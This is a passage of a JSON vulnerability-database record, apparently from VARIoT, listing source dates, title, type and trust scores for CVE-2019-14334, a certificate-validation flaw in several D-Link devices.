"id": "153840"
},
{
"date": "2019-07-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-1635"
},
{
"date": "2019-08-01T13:15:14.100000",
"db": "NVD",
"id": "CVE-2019-14334"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-29149"
},
{
"date": "2019-08-05T00:00:00",
"db": "VULHUB",
"id": "VHN-146270"
},
{
"date": "2019-08-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-007262"
},
{
"date": "2019-08-06T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-1635"
},
{
"date": "2024-11-21T04:26:31.880000",
"db": "NVD",
"id": "CVE-2019-14334"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-1635"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural D-Link Vulnerabilities related to certificate validation in product devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-007262"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "trust management problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-1635"
}
],
"trust": 0.6
}
}